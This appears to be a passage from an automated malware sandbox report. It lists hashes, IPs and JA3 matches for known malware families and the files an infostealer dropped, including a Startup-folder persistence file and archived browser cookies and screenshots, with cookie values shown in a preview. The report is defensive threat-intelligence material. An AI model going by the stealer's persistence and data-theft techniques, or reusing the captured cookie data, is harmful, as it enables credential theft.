	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	173.181.21.133
	nsharm5.elf	Get hash	malicious	Mirai	Browse	207.194.52.244
TUT-ASUS	main.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, PRYSMAX STEALER	Browse	208.95.112.1
	main.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm	Browse	208.95.112.1
	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	fvbhdyuJYi.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	8DiSW8IPEF.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	twE44mm07j.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	YgJ5inWPQO.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	tg.exe	Get hash	malicious	Babadeda	Browse	162.159.138.232 108.181.20.35
	tg.exe	Get hash	malicious	Babadeda	Browse	162.159.138.232 108.181.20.35
	setup.exe	Get hash	malicious	Babadeda	Browse	162.159.138.232 108.181.20.35
	Loader.exe	Get hash	malicious	RHADAMANTHYS	Browse	162.159.138.232 108.181.20.35
	medicalanalysispro.exe	Get hash	malicious	RHADAMANTHYS	Browse	162.159.138.232 108.181.20.35
	winwidgetshp.mp4.hta	Get hash	malicious	LummaC	Browse	162.159.138.232 108.181.20.35
	Support.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	162.159.138.232 108.181.20.35
	NOTIFICATION_OF_DEPENDANTS_1.vbs	Get hash	malicious	Unknown	Browse	162.159.138.232 108.181.20.35
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	162.159.138.232 108.181.20.35
	HLMJbase.dll	Get hash	malicious	Unknown	Browse	162.159.138.232 108.181.20.35

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse
	https___files.catbox.moe_l2rczc.pif.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\Downloads\setup_x86.exe	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\Downloads\setup_x86.exe	https___files.catbox.moe_l2rczc.pif.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr

Download File

Process:	C:\Users\user\Downloads\setup_x86.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	190464
Entropy (8bit):	5.995125051419421
Encrypted:	false
SSDEEP:	3072:L+AIo6iee4xc7I+g4A9PtLmMf8noNM3MWQ/s17LVHEEPX9p8lt1WkXBkrY1SZbBc:LGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17P
MD5:	E09F55D421CB45340A8C97C217BA56CF
SHA1:	2280AFE7BB2D07C315E2599C21F069DD1B7CE3B8
SHA-256:	1E8D2F6FA4B8D1EC630758422C493DE85D367F2EB7C76B452B9843ED2B2A7BFF
SHA-512:	0D690F46D18855009AF0B15A8E352DBE178DE4D0F055FAB00CC18837AD30AEE3FFFFEF5263BB6598FF0E6BA7DBB55029CE976101BE853CB03B01B9B440418C8B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: apDMcnqqWs.exe, Detection: malicious, Browse Filename: https___files.catbox.moe_l2rczc.pif.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............^.... ........@.. .......................@............`.....................................O.......P.................... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...P...........................@..@.reloc....... ......................@..B................@.......H...........@T......0....................................................0..w.............%.T...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~.......t...0.............(....,..r...ps....z..0..!..........,..o.............(....Q+...Q.....0..5........(.......(....-#.,..o.....(....-..%-.&(......o.....&...(....^......(.....(.........^......(.....(...........0.......... ....s........(....-...o....2.(....(....*..0..........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\setup_x86.exe.log

Download File

Process:	C:\Users\user\Downloads\setup_x86.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1965
Entropy (8bit):	5.377802142292312
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
MD5:	582A844EB067319F705A5ADF155DBEB0
SHA1:	68B791E0F77249BF83CD4B23A6C4A773365E2CAD
SHA-256:	E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
SHA-512:	6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\4QwS6TE4dKTLldI

Download File

Process:	C:\Users\user\Downloads\setup_x86.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GWb46Z7cSlJX4lz

Download File

Process:	C:\Users\user\Downloads\setup_x86.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04mxujz5.pie.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ulx5rev.mi4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4yhkhcyn.jky.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5g4jcszt.bnw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crvctiny.kez.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5ibsnrt.15e.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eorlu3tw.ytk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggzbnwr2.bgp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_moesrcga.bpn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nq5r3pln.esz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmnm4jkw.nxw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0hnrbpo.ilz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\gZqLGy8E1QI7rzP.ligma

Download File

Process:	C:\Users\user\Downloads\setup_x86.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	659552
Entropy (8bit):	7.99788145417493
Encrypted:	true
SSDEEP:	12288:K8rocIWWKhwXxDu7MgbqjOSPz7WJmktYwHmWmM/AOsdhm+fBgSN:K88A/uXx4NlCHWk1wGDUAthm+fBgO
MD5:	DA2073FAE5801FA37919D94C6EB13DDA
SHA1:	56ED32D5B9B6DBB68376BF1A360A89A525B59316
SHA-256:	75BE4B3771456848F30F4E54EE32BB556C7FF014170231CC0889A64E9CD8CC5A
SHA-512:	1F0AB13737D9870C94A498532CF0D0379803CA759C3C27F9073B5612CE632B3DD4A7DCDF8E0F573741D95A45DFDB0AA87C1F3B450A3C71ECB77A46B4EAE0544C
Malicious:	false
Preview:	PK........-..Y..Q.....!...#...Browsers/Cookies/Chrome Cookies.txt}..rC@....f&.Bw.].z .?.1...D.Q!S.}.......ij.\O#H....8.Al....j..PQ..b.........!W.]d..>w.?.lx.....].>N.9..:=]X]},.r..=...,.........]d=.c.%..&u:.k..Uy==...x...1.>R.[.X._....{....ez.^..q2.BRX.......bf.v#...*!..P..Q....M..........v..PK........-..Y.W..W....X......Display/Display.pngl.w<[.......XEk....T[l.C.R5kT....#....-E..Q<k.....R.g.Q{D.#B..x......\~.p".......o.s.'..-.s.....8w..........Vf....1}.....UCBk....o..@m....C.Z8............NJ.....q.S..xb.X.....?T.pw)d.=....C...{...~.\....Q.o.....Ys..].b~.#6LJc....+e...aM.......?.Sq...[..T...\+.l./v^4.r.p.BCz...L.p3..~.T....1..q-Rk#W...p?<~x.?x..+...rq.M.V.uN.iM+y.GvI....t..W]..,.H..0.........M.V8....M..h..=.......]..wO.O.....u~=J..7...)_tdv...(.t.....:...wh.."..v........u.z.^;..8.\|.p.B...A.dk.7.o.;..u...(a..nh...?".].j~..4.SA..d@;._...X...Pf..k../.T..3..E..~>.E..l......M{.o..6....R.xMJ......A&i...O^.<6/.xO.....i.....K.C1/x>...\|H c..S..Xf.l.`

C:\Users\user\AppData\Local\Temp\gZqLGy8E1QI7rzP\Browsers\Cookies\Chrome Cookies.txt

Download File

Process:	C:\Users\user\Downloads\setup_x86.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.850578214989895
Encrypted:	false
SSDEEP:	6:Pk3r4QVLP36lSMDuyXdt3RdVAkEhW/UPmTU4OvOrGISh+3rsB7iUuxbW:c74QVLP3ClDuyXv3RdJqmOvO65+7273N
MD5:	12374B4FCB7DCDDB399BBC691B28FEDC
SHA1:	2CCDFE6CAC3A0DF5A73E0009BF7C256030C9B77B
SHA-256:	E952C4E4D88F7E4F25CC1CD22DFB854184B11C727EB19733E48819C7FB8D8990
SHA-512:	4D0DA18548AD301EA9A165E78526269A1000E0CA856A08669A1520FCD5503AD7C608C477C892F550F28076263044055F30E52EB588855D38C934C16B617FF2AA
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.13356771602392648.NID.511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg...google.com.TRUE./.FALSE.13343552440345167.1P_JAR.2023-10-05-06..

C:\Users\user\AppData\Local\Temp\gZqLGy8E1QI7rzP\Display\Display.png

Download File

Process:	C:\Users\user\Downloads\setup_x86.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	678140
Entropy (8bit):	7.924677234483799
Encrypted:	false
SSDEEP:	12288:IbiknautSreyWKaqjjRuROvaQUFJ0g9N0TtOK8zY5WLdCkjXSHkHVsj4:3BMSeyRaqx6OvaQUn0gssK8k6f1H
MD5:	B1AF66CDD01B50EDA5972CB365FECB4D
SHA1:	2F2A25D897F7EC4092F2562F5D4397F0363A6743
SHA-256:	43A77A98EC40E309AA87FB91C204099917F42EC058957C06BA15F5477141AB6F
SHA-512:	9386DA6120AAF00C51A57881E890BEE4A18E2BA1D00A9249EB12E5D7B2845902E2AD3D1A2D05B66830B1FF170BCBEC6BEA51D5CB9944D5438587B018679D2C4B
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..i.mWu.......tU.x.......WeW...J..4...o.@....[....... .....e..$@}..... Z..7.l.....N.X1.8..^.....s.s"..1...?......)..9e.I}9......{....w.b..r..^[...5.]....q.^.do..Yz.2.W}....+.-....o..+.nS,."g.g..7........X.K/.o.d..r...^.q./..,..g..;&..[4..\|}],=....k..6..O..)...+{..\|y....Ks..0~..f../N.....g~q..g\|a&KO......V.......KO.m~....1~...].KO...'\|f&......=./......W.6.......1........g..Q9K..Te.#z.........+m.kc...g.4......Xz.'.y...=........w.....x.'..g..m..xe.A7.X.[.9`.....NXs....w....x].../.m%...vF....xa..Y.......V\/=.Il..n.v.Q.x.5.._]a.;.w...g\[c;.pm......R?......n....)Wu....s.;._.[.....w.~]....*..b..q'ue>:..c...3>.:..R.<........s.Xo;..N..2>..Il.i.u..W.-.X.....r..w........9.....v..?6.5.<.\|V.G.}...8.........^Fb.w..ug..w.pY.]..~\|9..r.q....r+8..-...?R.v.G..r....si..#.tt9....G~.[:.#u...}..._2...s.qt97........;../...G......^>..Y'.......y..z....

C:\Users\user\AppData\Local\Temp\hjl2sU32eQgqlJ6

Download File

Process:	C:\Users\user\Downloads\setup_x86.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\oJS6JdBCH5vENDt

Download File

Process:	C:\Users\user\Downloads\setup_x86.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SV0XGA23E67ZYJ824WRA.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4508
Entropy (8bit):	3.78446341859127
Encrypted:	false
SSDEEP:	48:7lqQQuAGs+ZYVb6GlHJzSogZo45YVb6GlLzSogZoc1:M2Aq+b6GqH/+b6GcHz
MD5:	9AB3AE3EBEFC693DD916FC62733B9D74
SHA1:	C37459F899B1634DAC68A471FA1EB8DC67A31703
SHA-256:	72B42A4CA356F18F097BF555B6AF39281E5FAF763726066BE93379BF6D6B4795
SHA-512:	51B6CB3D23A35C68A83C1C969EB83B8F4779E8F1A3B930BD3EDCAC50BC458E600FB4CC722CE34D1D80F479AC3514DA383A304951335B60B3E39AE3DF1F795664
Malicious:	false
